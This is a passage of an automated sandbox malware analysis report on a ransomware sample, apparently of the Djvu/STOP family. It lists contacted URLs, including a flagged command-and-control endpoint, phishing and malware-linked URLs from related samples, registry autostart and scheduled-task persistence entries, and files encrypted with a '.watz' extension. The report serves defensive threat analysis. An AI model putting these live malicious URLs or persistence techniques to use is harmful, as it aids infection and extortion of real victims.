https://api.2ip.ua/geo.jsondVz	file.exe, 0000000D.00000003.2115984764.00000000008C2000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.2ip.ua/	file.exe, 00000001.00000002.1765596117.000000000072A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000007.00000002.1894667109.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 0000000B.00000002.1993113775.0000000000924000.00000004.00000020.00020000.00000000.sdmp, file.exe, 0000000B.00000002.1993113775.00000000008D8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 0000000B.00000003.1992047966.0000000000923000.00000004.00000020.00020000.00000000.sdmp, file.exe, 0000000C.00000003.2065520432.00000000008B7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 0000000C.00000002.2066911919.00000000008B9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 0000000D.00000002.2936387316.0000000000868000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.2ip.ua/geo.jsonZ	file.exe, 0000000B.00000003.1992047966.0000000000962000.00000004.00000020.00020000.00000000.sdmp, file.exe, 0000000B.00000002.1993113775.0000000000962000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.2ip.ua/geo.jsonVh	file.exe, 0000000D.00000002.2936387316.0000000000828000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.amazon.com/	file.exe, 0000000D.00000003.2177964682.0000000003570000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.2ip.ua/geo.json%	file.exe, 0000000C.00000002.2066911919.0000000000868000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.twitter.com/	file.exe, 0000000D.00000003.2178534259.0000000003570000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.2ip.ua/X	file.exe, 00000001.00000002.1765596117.000000000072A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.openssl.org/support/faq.html	file.exe, 0000000D.00000002.2936140866.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error	file.exe, 00000000.00000002.1752226229.00000000021A0000.00000040.00001000.00020000.00000000.sdmp, file.exe, 00000001.00000002.1765380462.0000000000400000.00000040.00000400.00020000.00000000.sdmp, file.exe, 00000003.00000002.1883209457.00000000022F0000.00000040.00001000.00020000.00000000.sdmp, file.exe, 00000004.00000002.2105284111.00000000021E0000.00000040.00001000.00020000.00000000.sdmp, file.exe, 00000006.00000002.1978697322.0000000002230000.00000040.00001000.00020000.00000000.sdmp, file.exe, 00000007.00000002.1892636740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, file.exe, 0000000A.00000002.2056958884.00000000022C0000.00000040.00001000.00020000.00000000.sdmp, file.exe, 0000000B.00000002.1992636135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, file.exe, 0000000C.00000002.2066559473.0000000000400000.00000040.00000400.00020000.00000000.sdmp, file.exe, 0000000D.00000002.2936140866.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.2ip.ua/geo.jsony	file.exe, 0000000B.00000002.1993113775.00000000008D8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.2ip.ua/A	file.exe, 00000007.00000002.1894667109.00000000006BA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://cajgtus.com/test1/get.php?pid=F8AFCDC4E800A3319FFB343E83099637	file.exe, 0000000D.00000002.2936387316.0000000000868000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://api.2ip.ua/geo.json5	file.exe, 00000007.00000002.1894667109.00000000006BA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.2ip.ua/geo.jsont	file.exe, 0000000B.00000002.1993113775.00000000008D8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.youtube.com/	file.exe, 0000000D.00000003.2178673504.0000000003570000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.2ip.ua/geo.json3	file.exe, 00000007.00000002.1894667109.0000000000678000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.2ip.ua/geo.jsons	file.exe, 0000000C.00000002.2066911919.0000000000868000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.wikipedia.com/	file.exe, 0000000D.00000003.2178603704.0000000003570000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.2ip.ua/geo.jsonN	file.exe, 00000007.00000002.1894667109.0000000000702000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.live.com/	file.exe, 0000000D.00000003.2178296950.0000000003570000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.reddit.com/	file.exe, 0000000D.00000003.2178465373.0000000003570000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.2ip.ua/geo.jsonG	file.exe, 0000000B.00000002.1993113775.00000000008D8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://cajgtus.com/test1/get.php?pid=F8AFCDC4E800A3319FFB343E83099637Q	file.exe, 0000000D.00000002.2936387316.0000000000868000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://api.2ip.ua/7	file.exe, 0000000B.00000002.1993113775.0000000000924000.00000004.00000020.00020000.00000000.sdmp, file.exe, 0000000B.00000003.1992047966.0000000000923000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://wetransfer.com/downloads/abe121434ad837dd5bdd03878a14485820240531135509/34284d	file.exe, 0000000D.00000002.2936387316.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 0000000D.00000002.2936387316.00000000008E2000.00000004.00000020.00020000.00000000.sdmp, file.exe, 0000000D.00000002.2936387316.00000000008C3000.00000004.00000020.00020000.00000000.sdmp, _readme.txt0.13.dr, _readme.txt.13.dr	true	Avira URL Cloud: safe	unknown
http://www.google.com/	file.exe, 0000000D.00000003.2178225867.0000000003570000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.2ip.ua/9	file.exe, 0000000D.00000002.2936387316.0000000000868000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.2ip.ua/EQ	file.exe, 00000007.00000002.1894667109.00000000006BA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
188.114.97.3	api.2ip.ua	European Union		13335	CLOUDFLARENETUS	false
58.151.148.90	cajgtus.com	Korea Republic of		17858	POWERVIS-AS-KRLGPOWERCOMMKR	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1490493
Start date and time:	2024-08-09 10:47:07 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 1s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	16
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.rans.troj.evad.winEXE@18/232@4/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 99% Number of executed functions: 33 Number of non-executed functions: 206
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, d.3.0.0.0.0.0.0.0.0.0.0.0.0.0.0.7.0.0.0.8.0.4.0.0.3.0.1.3.0.6.2.ip6.arpa, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
09:48:10	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run SysHelper "C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe" --AutoStart
09:48:11	Task Scheduler	Run new task: Time Trigger Task path: C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe s>--Task
09:48:18	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run SysHelper "C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe" --AutoStart

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
188.114.97.3	http://us-ledgerlive.com/	Get hash	malicious	Unknown	Browse	us-ledgerlive.com/
	http://nike.m-h-azaddel9225.workers.dev/	Get hash	malicious	Unknown	Browse	nike.m-h-azaddel9225.workers.dev/cdn-cgi/challenge-platform/scripts/jsd/main.js
	BlazeHack.exe	Get hash	malicious	PureLog Stealer, RedLine, Xmrig	Browse	joxi.net/4Ak49WQH0GE3Nr.mp3
	CKHSihDX4S.exe	Get hash	malicious	RedLine, Xmrig	Browse	joxi.net/4Ak49WQH0GE3Nr.mp3
	XXZahG4d9Z.exe	Get hash	malicious	RedLine, Xmrig	Browse	joxi.net/4Ak49WQH0GE3Nr.mp3
	PAYMENT ERROR.exe	Get hash	malicious	FormBook	Browse	www.legacycommerceltd.com/oi12/?XzrtQJx=zgYRRvdyGaV1CIo0QcGNfxfpiIRlgUt3QYeNcPlb0pKn5vsN5eriLRLsx83JezlODSWbZyR3yA==&QpCLi=0bpdGDM8Qnw4Jd30
	BL6387457290.exe	Get hash	malicious	FormBook	Browse	www.bbyul.shop/1i58/
	QUOTATION_AUGQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Unknown	Browse	filetransfer.io/data-package/7wFhpez4/download
	QUOTATION_AUGQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Unknown	Browse	filetransfer.io/data-package/jdxFnPJT/download
	QUOTATION_JULQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Unknown	Browse	filetransfer.io/data-package/HPg28kQA/download
58.151.148.90	n72I7qB2ss.exe	Get hash	malicious	SmokeLoader	Browse	mzxn.ru/tmp/index.php
	file.exe	Get hash	malicious	SmokeLoader	Browse	gebeus.ru/tmp/index.php
	cOm0MmeV34.exe	Get hash	malicious	SmokeLoader	Browse	gebeus.ru/tmp/index.php
	file.exe	Get hash	malicious	SmokeLoader	Browse	gebeus.ru/tmp/index.php
	file.exe	Get hash	malicious	LummaC, SmokeLoader	Browse	gebeus.ru/tmp/index.php
	2gQsoHaGEm.exe	Get hash	malicious	LummaC, CryptOne, LummaC Stealer, SmokeLoader, Vidar	Browse	dbfhns.in/tmp/index.php
	QJqJic3hex.exe	Get hash	malicious	LummaC, CryptOne, LummaC Stealer, SmokeLoader, Vidar	Browse	dbfhns.in/tmp/index.php
	mJVVW85CnW.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	cajgtus.com/files/1/build3.exe
	a6GOcbfMde.exe	Get hash	malicious	SmokeLoader	Browse	nidoe.org/tmp/index.php
	oowDCOLXv5.exe	Get hash	malicious	LummaC, Babuk, Djvu, RedLine, SmokeLoader, Stealc, Vidar	Browse	brusuax.com/dl/build2.exe

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
cajgtus.com	file.exe	Get hash	malicious	Babuk, Djvu	Browse	109.175.29.39
	setup.exe	Get hash	malicious	Babuk, Djvu	Browse	211.181.24.133
	setup.exe	Get hash	malicious	Babuk, Djvu	Browse	211.181.24.133
	setup.exe	Get hash	malicious	Babuk, Djvu	Browse	175.119.10.231
	setup.exe	Get hash	malicious	Babuk, Djvu	Browse	181.204.98.226
	setup.exe	Get hash	malicious	Babuk, Djvu	Browse	190.12.87.61
	TfsbrHNaOX.exe	Get hash	malicious	Djvu	Browse	78.89.199.216
	Nlwkg1ycJ4.exe	Get hash	malicious	Babuk, Djvu	Browse	78.89.199.216
	XQpBmNRd7j.exe	Get hash	malicious	Djvu	Browse	190.224.203.37
	file.exe	Get hash	malicious	Babuk, Djvu	Browse	179.53.197.185
api.2ip.ua	setup.exe	Get hash	malicious	Babuk, Djvu	Browse	188.114.96.3
	e8997f96b91ab5ea1fed555a7d62369a8307b0cfcbd0e32c5e9a7e430ab42240.zip	Get hash	malicious	Djvu	Browse	188.114.97.3
	A9095F44928219267930271D2AD000C7B2F7F2616DB4AD186E5D3AA283D14764.exe	Get hash	malicious	Babuk, Bdaejec, Djvu	Browse	188.114.96.3
	DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe	Get hash	malicious	Babuk, Bdaejec, Djvu, Zorab	Browse	188.114.97.3
	E9E758383C0F518C4DBD1204A824762F5FAC37375D8C5695C749AD1C36C0F108.exe	Get hash	malicious	Babuk, Bdaejec, Djvu, Zorab	Browse	188.114.96.3
	FC0D639C0918938BDF00FA6F1DC4BC03002C328428FC34A34B050AEE8E3BEB8C.exe	Get hash	malicious	Babuk, Bdaejec, Djvu	Browse	188.114.96.3
	F8DB10513DB12A4BB861D7B1F52E56F5DE5F5DBA7614FDEE3DB67B191FEE85C6.exe	Get hash	malicious	Babuk, Bdaejec, Djvu	Browse	188.114.96.3
	F2E3FA89C1A2C72EA78C4D32446221C08B30C7C3363F8248F04AA9EEE2E15C70.exe	Get hash	malicious	Babuk, Bdaejec, Djvu	Browse	188.114.96.3
	e26edae12836af5e3c42984eca4da6de5d4853701ef28c178de2276575408bb8.exe	Get hash	malicious	Babuk, Bdaejec, Djvu	Browse	188.114.96.3
	E1BE354A31A340C3EBE7BF14ED0FBBCB788A47190B253D05067E9E8698C25698.exe	Get hash	malicious	Babuk, Bdaejec, Djvu	Browse	188.114.96.3

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
POWERVIS-AS-KRLGPOWERCOMMKR	mips.elf	Get hash	malicious	Mirai	Browse	125.177.133.234
	x86.elf	Get hash	malicious	Mirai	Browse	49.169.206.34
	botx.x86.elf	Get hash	malicious	Mirai	Browse	124.49.142.110
	sora.mpsl.elf	Get hash	malicious	Mirai	Browse	182.222.125.93
	sora.m68k.elf	Get hash	malicious	Mirai	Browse	115.137.225.165
	sora.sh4.elf	Get hash	malicious	Mirai	Browse	112.149.0.157
	arm7.elf	Get hash	malicious	Mirai	Browse	180.227.248.45
	185.196.11.135-arm-2024-08-06T18_49_53.elf	Get hash	malicious	Mirai	Browse	14.4.13.59
	n72I7qB2ss.exe	Get hash	malicious	SmokeLoader	Browse	58.151.148.90
	154.216.17.9-skid.arm-2024-08-04T06_22_56.elf	Get hash	malicious	Mirai, Moobot	Browse	116.40.18.75
CLOUDFLARENETUS	file.exe	Get hash	malicious	LummaC	Browse	104.21.16.74
	email_2024-08-08_093556_00 (2).mht	Get hash	malicious	Coinhive, Xmrig	Browse	172.64.41.3
	file.exe	Get hash	malicious	LummaC	Browse	104.21.16.74
	OAm9T55xwO.exe	Get hash	malicious	Unknown	Browse	104.21.14.6
	http://siritelsystems.com/SoO9MU/zSoOx.php?tySq=dY29yaW5uZS53aWxsaWFtc0BpbWFnby5jb21tdW5pdHk=	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	OAm9T55xwO.exe	Get hash	malicious	Unknown	Browse	172.67.133.151
	https://go.microsoft.com/fwlink/?LinkID=2092201&clcid=0x407	Get hash	malicious	Unknown	Browse	172.64.151.101
	https://vxc10p47.r.us-east-1.awstrack.me/L0/https:%2F%2Fclicks.aweber.com%2Fy%2Fct%2F%3Fl=RWkA%26m=hk.kcnnXakA_pdP%26b=bnPfD1iFxh1uWUht.GbbPA%23MYXBwbGVzQHNocmV3c2J1cnlmb29kaHViLm9yZy51aw==/1/0100019131644990-5882e481-1b24-4072-8460-1d67ffa05131-000000/JkpGOsAP4yHL6UkbTOLbUcEoYXc=386	Get hash	malicious	Unknown	Browse	104.18.20.223
	Quarantined Messages(2).zip	Get hash	malicious	Unknown	Browse	1.1.1.1
	https://ebay.onelink.me/TAsm?3ihwpid=Email&c=CM_Incentives_App-only_program&Country=UK&af_web_dp=https://brandequity.economictimes.indiatimes.com.////etl.php?url=https://x26x.com/banks/neil//ksjgk7wemnbo03lhbbkzwog/ai5lbGtvdWJ5bGVjbGVyY3FAc2JtLm1j	Get hash	malicious	HTMLPhisher	Browse	104.18.11.207

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	file.exe	Get hash	malicious	Vidar	Browse	188.114.97.3
	file.exe	Get hash	malicious	Vidar	Browse	188.114.97.3
	Ordine 403012.docx.doc	Get hash	malicious	Unknown	Browse	188.114.97.3
	SecuriteInfo.com.Trojan.Crypt.23519.13317.exe	Get hash	malicious	Unknown	Browse	188.114.97.3
	SecuriteInfo.com.Trojan.Crypt.23519.13317.exe	Get hash	malicious	Unknown	Browse	188.114.97.3
	verify-captcha-987.b-cdn.net.ps1	Get hash	malicious	Clipboard Hijacker	Browse	188.114.97.3
	verifyhuman476.b-cdn.net.ps1	Get hash	malicious	Clipboard Hijacker	Browse	188.114.97.3
	QlvSYg5fGX.exe	Get hash	malicious	CobaltStrike	Browse	188.114.97.3
	QlvSYg5fGX.exe	Get hash	malicious	CobaltStrike	Browse	188.114.97.3
	Setup.exe	Get hash	malicious	Go Injector, Stealc, Vidar	Browse	188.114.97.3

Dropped Files

⊘No context

Created / dropped Files

C:\SystemID\PersonalID.txt

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	42
Entropy (8bit):	5.0589840894454285
Encrypted:	false
SSDEEP:	3:mCdM8TyWkCVyboyn:MWycyn
MD5:	38924F2436CC79B29A5BCF2E3C1C41EF
SHA1:	4C2BE411671EA0E15BB9F437FA021DD6B1802B4F
SHA-256:	EA272518A151FA4419D63DA1B3AE8512D9EDFDC9455D70879736229563F81DA9
SHA-512:	1D1446EFE7BE19D7034601C20DA35BB82AAEDFE6526CFF1B5FB8F9B555C97356DF70CB3EAACDAF0BF7BF0E41C15DE423313ADBCA6FFA9E7D07A89ECFCB54617E
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	SLibyJ8nZP43K8X6Ycor9IxvOlsKHVTLIpW2nQ4P..

C:\Users\user\.curlrc

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	342
Entropy (8bit):	7.279592521017852
Encrypted:	false
SSDEEP:	6:KWvS9wfIRhkGvVIexoAXllSP2GWYZ5s5b63AsZSvATBZpUuMLpffWyc3cii96Z:NvhoIio2B05flAu0Jf1+cii9a
MD5:	5635D90855C4FD256693232D2C35CCA5
SHA1:	5A59AE2652031AB155C2DA3DF011BACAFD72241E
SHA-256:	5FECFFD65A04FD5E678BD2154CBB1A15F1B15279CF3AADECF5CA75F3A15B0313
SHA-512:	573CAA210348A95A7DBC7220E8071A301CFDBEFC76C87B9545F876C9165C442E3B0B0AA0756EEAAAC519264A73E1A11A63B294F19FE15E29E66CF63EBB490519
Malicious:	false
Reputation:	low
Preview:	insec...;^..9.@U.8..J0.v.......3\|.PO.EZ..6.R.."..../...0.&,..J....%/.Z.h...&.Z<..G.L.w..h....c.~u.a.".\t"..{..b.A...H.n:e\|.1@..\|G.....G..Aj.......a..".{..W.V%....^.Xj..1>..G.k$P...&.V..=.........._Cm.H.eV..@p.SZ......7.....r.-.{...T..p.......)......../.SLibyJ8nZP43K8X6Ycor9IxvOlsKHVTLIpW2nQ4P{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\.curlrc.watz (copy)

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	342
Entropy (8bit):	7.279592521017852
Encrypted:	false
SSDEEP:	6:KWvS9wfIRhkGvVIexoAXllSP2GWYZ5s5b63AsZSvATBZpUuMLpffWyc3cii96Z:NvhoIio2B05flAu0Jf1+cii9a
MD5:	5635D90855C4FD256693232D2C35CCA5
SHA1:	5A59AE2652031AB155C2DA3DF011BACAFD72241E
SHA-256:	5FECFFD65A04FD5E678BD2154CBB1A15F1B15279CF3AADECF5CA75F3A15B0313
SHA-512:	573CAA210348A95A7DBC7220E8071A301CFDBEFC76C87B9545F876C9165C442E3B0B0AA0756EEAAAC519264A73E1A11A63B294F19FE15E29E66CF63EBB490519
Malicious:	false
Reputation:	low
Preview:	insec...;^..9.@U.8..J0.v.......3\|.PO.EZ..6.R.."..../...0.&,..J....%/.Z.h...&.Z<..G.L.w..h....c.~u.a.".\t"..{..b.A...H.n:e\|.1@..\|G.....G..Aj.......a..".{..W.V%....^.Xj..1>..G.k$P...&.V..=.........._Cm.H.eV..@p.SZ......7.....r.-.{...T..p.......)......../.SLibyJ8nZP43K8X6Ycor9IxvOlsKHVTLIpW2nQ4P{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	626
Entropy (8bit):	7.622547618548494
Encrypted:	false
SSDEEP:	12:kHp/pcTiL3hUa9sUh30ikt/bBE2noHQ7KFk/+Ozba+1L2ialvXJkucMrqV1+ciik:KBcvoktDBEcrQkmOzV12ZSmbD
MD5:	88DF0268D0E5F7BFC35D09B286A27CA5
SHA1:	44C1304DBD9D40B16FAE3D84DE0AC6C22C8C5518
SHA-256:	008C4094FACCABAC9E218B27A797D667F36EAFA0C8C5F3CE39714D56D5D15226
SHA-512:	E9B60BBD1D25415440AB073165A67BFF3173FD85BCFDDE116A0E68FC31A36A10445C34ED1C0A7AE61A6E3D97C5A0A59D3B8947E75A8719B0532AB1C3DBF9C781
Malicious:	false
Reputation:	low
Preview:	2023/h3...j..3h.U.G.wC..#5..2....q..o.K>(7..r..P^..h..p....E...Y...@B....o.G0.D..d.z.S@9n..Bs...2}...?z..'.....[.../d.~.....L.S...!...v.....F..%.[.5...4..#Z...".J&.....s.y...z....{.x...i....}..Z=~.G..@...x...Mg.Y..I/..x....XR..P.\|.U..L.>.O..t...x.{.A..I.:#.P]..'O..m..0.q...\|c.R..n.)..,.._Q....]IL....^.CM.Qt..T..#...\..0...../..n=..K..y.t..3.9.....Jfo...,....l............a..^...)...LdY(...^.....3..\.......x...}..B...@D'O..+L.x.Cn.L>.8......8.~...8...@..D..-.`..l.._ ..o.x../i.-...._..4~....O..q.6G.\|N@Q.D(...=s.jn.SLibyJ8nZP43K8X6Ycor9IxvOlsKHVTLIpW2nQ4P{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old.watz (copy)

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	626
Entropy (8bit):	7.622547618548494
Encrypted:	false
SSDEEP:	12:kHp/pcTiL3hUa9sUh30ikt/bBE2noHQ7KFk/+Ozba+1L2ialvXJkucMrqV1+ciik:KBcvoktDBEcrQkmOzV12ZSmbD
MD5:	88DF0268D0E5F7BFC35D09B286A27CA5
SHA1:	44C1304DBD9D40B16FAE3D84DE0AC6C22C8C5518
SHA-256:	008C4094FACCABAC9E218B27A797D667F36EAFA0C8C5F3CE39714D56D5D15226
SHA-512:	E9B60BBD1D25415440AB073165A67BFF3173FD85BCFDDE116A0E68FC31A36A10445C34ED1C0A7AE61A6E3D97C5A0A59D3B8947E75A8719B0532AB1C3DBF9C781
Malicious:	false
Reputation:	low
Preview:	2023/h3...j..3h.U.G.wC..#5..2....q..o.K>(7..r..P^..h..p....E...Y...@B....o.G0.D..d.z.S@9n..Bs...2}...?z..'.....[.../d.~.....L.S...!...v.....F..%.[.5...4..#Z...".J&.....s.y...z....{.x...i....}..Z=~.G..@...x...Mg.Y..I/..x....XR..P.\|.U..L.>.O..t...x.{.A..I.:#.P]..'O..m..0.q...\|c.R..n.)..,.._Q....]IL....^.CM.Qt..T..#...\..0...../..n=..K..y.t..3.9.....Jfo...,....l............a..^...)...LdY(...^.....3..\.......x...}..B...@D'O..+L.x.Cn.L>.8......8.~...8...@..D..-.`..l.._ ..o.x../i.-...._..4~....O..q.6G.\|N@Q.D(...=s.jn.SLibyJ8nZP43K8X6Ycor9IxvOlsKHVTLIpW2nQ4P{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	670
Entropy (8bit):	7.663381108982434
Encrypted:	false
SSDEEP:	12:kQBTOkt5kShR31uKHscMPW/UmkPl4k7dbzffgjLXjhTOTy1+cii9a:VTOkzkQQxcMPuUmkPD7NffgvhONbD
MD5:	9B9EF809A20BA01DBC1BDF78D65C4C4F
SHA1:	69BC8356ECB3E4B4EFF0BC8FFE907E0C73F429FE
SHA-256:	E9CB14BCAC95F23A01CD686DB40C9E5C516FA8DA7515A58ABA8426166B83A6AA
SHA-512:	E34D38DCD59CDBD474A55649F4B157E5C29E9B322A284D893A64DD641935B3FFD2082B5D7E7955FE7A1D86F3EB6C3E8EEB383AC72907ADD8098B3B36AA1A9E6C
Malicious:	false
Reputation:	low
Preview:	2023/....@.)q.v......x.....Y.9.2.,.D.dr!~#C,.".F.@6..q...6_..c.]..c.....~.?E3.3Wc...Y..1W~..!..?...qb{.(f.CV@k23..Z....K..P.....;qf.\|..kz.;..N5.2h!z.Xp.dmt.B....]C...].:.8...Vn..Td.P'..._...uqKR.q......O7..&]....\|8...zK>.3.)F...a......<^...p\|d.2..R?...?^b.T........00vMy...'.U...._.B.r.m.C.L0...d....+......nE....5....K..).."..e)U.p.U.......T]ST.+.......A...W.I.<..]N..?.N...U.2.&'.[...J.h...0.......[.3`~...\|.........#;N'\|b...s.A.....E.....7w..@...M.d.l.i....g..b[u..`.\|.../S;..>.-.......:n.n.F...s.}'......0....w..,..I.....d..:...................7.SLibyJ8nZP43K8X6Ycor9IxvOlsKHVTLIpW2nQ4P{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old.watz (copy)

Download File

Process:	C:\Users\user\AppData\Local\74fcc834-7218-4da9-b71d-691e5fe5c42c\file.exe
File Type:	data
Category:	dropped
Size (bytes):	670
Entropy (8bit):	7.663381108982434
Encrypted:	false
SSDEEP:	12:kQBTOkt5kShR31uKHscMPW/UmkPl4k7dbzffgjLXjhTOTy1+cii9a:VTOkzkQQxcMPuUmkPD7NffgvhONbD
MD5:	9B9EF809A20BA01DBC1BDF78D65C4C4F
SHA1:	69BC8356ECB3E4B4EFF0BC8FFE907E0C73F429FE
SHA-256:	E9CB14BCAC95F23A01CD686DB40C9E5C516FA8DA7515A58ABA8426166B83A6AA
SHA-512:	E34D38DCD59CDBD474A55649F4B157E5C29E9B322A284D893A64DD641935B3FFD2082B5D7E7955FE7A1D86F3EB6C3E8EEB383AC72907ADD8098B3B36AA1A9E6C
Malicious:	false
Reputation:	low
Preview:	2023/....@.)q.v......x.....Y.9.2.,.D.dr!~#C,.".F.@6..q...6_..c.]..c.....~.?E3.3Wc...Y..1W~..!..?...qb{.(f.CV@k23..Z....K..P.....;qf.\|..kz.;..N5.2h!z.Xp.dmt.B....]C...].:.8...Vn..Td.P'..._...uqKR.q......O7..&]....\|8...zK>.3.)F...a......<^...p\|d.2..R?...?^b.T........00vMy...'.U...._.B.r.m.C.L0...d....+......nE....5....K..).."..e)U.p.U.......T]ST.+.......A...W.I.<..]N..?.N...U.2.&'.[...J.h...0.......[.3`~...\|.........#;N'\|b...s.A.....E.....7w..@...M.d.l.i....g..b[u..`.\|.../S;..>.-.......:n.n.F...s.}'......0....w..,..I.....d..:...................7.SLibyJ8nZP43K8X6Ycor9IxvOlsKHVTLIpW2nQ4P{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LocalPrefs.json

Download File

